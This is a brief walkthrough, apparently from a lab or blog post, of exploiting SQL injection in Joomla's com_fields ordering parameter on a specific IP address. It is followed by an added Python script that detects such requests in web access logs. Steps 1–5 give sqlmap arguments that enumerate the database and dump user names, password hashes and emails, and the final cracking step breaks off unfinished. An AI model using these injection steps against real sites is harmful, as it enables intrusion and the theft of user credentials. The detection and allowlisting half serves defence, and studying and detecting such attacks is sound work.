1. Find the injection point:
"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D="
2. Use sqlmap on Kali to enumerate the database names:
"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" --dbs
3. Find the table names in the joomal database:
"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomal --tables
4. Find the column names in the table:
"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomal -T '#--users' --columns
5. Dump the usernames, passwords and e-mail addresses:
"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomal -T '#--users' -C username,password,email --dump
6. Wait for the cracking to succeed:
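
The detection side of the steps above, as an added example that is not part of the original post: a Python check over web access logs that flags com_fields requests whose list[fullordering] value is not a plain column-and-direction ordering, and notes a sqlmap User-Agent. The log lines, IP addresses, allowlist pattern and function name are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed allowlist: a column name plus optional direction, e.g. "a.title ASC".
SAFE_ORDERING = re.compile(r"^[A-Za-z_][A-Za-z0-9_.]*( (ASC|DESC))?$", re.I)

# Combined log format: ip - - [ts] "METHOD uri HTTP/x" status size "referer" "ua"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

BASE = "/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D="

# Constructed sample lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    f'198.51.100.7 - - [13/Aug/2024:14:30:00 +0000] "GET {BASE}a.title%20ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'203.0.113.9 - - [13/Aug/2024:14:31:02 +0000] "GET {BASE}%28SELECT%201%29 HTTP/1.1" 500 310 "-" "sqlmap/1.8#stable (https://sqlmap.org)"',
    f'203.0.113.10 - - [13/Aug/2024:14:31:40 +0000] "GET {BASE}%28SELECT%201%29 HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [13/Aug/2024:14:32:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def suspicious_requests(lines):
    """Return (ip, reasons) for com_fields requests with an unsafe ordering value."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # not in combined log format
        # parse_qs percent-decodes names, so list%5Bfullordering%5D becomes list[fullordering]
        query = parse_qs(urlsplit(m["uri"]).query, keep_blank_values=True)
        if query.get("option") != ["com_fields"] or "list[fullordering]" not in query:
            continue
        reasons = []
        if any(not SAFE_ORDERING.match(v) for v in query["list[fullordering]"]):
            reasons.append("ordering not allowlisted")
        if "sqlmap" in m["ua"].lower():
            reasons.append("sqlmap user-agent")
        if reasons:
            hits.append((m["ip"], reasons))
    return hits


if __name__ == "__main__":
    for ip, reasons in suspicious_requests(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```

The same allowlist idea applies server-side: an ordering parameter should be matched against known column names and directions before it reaches a query.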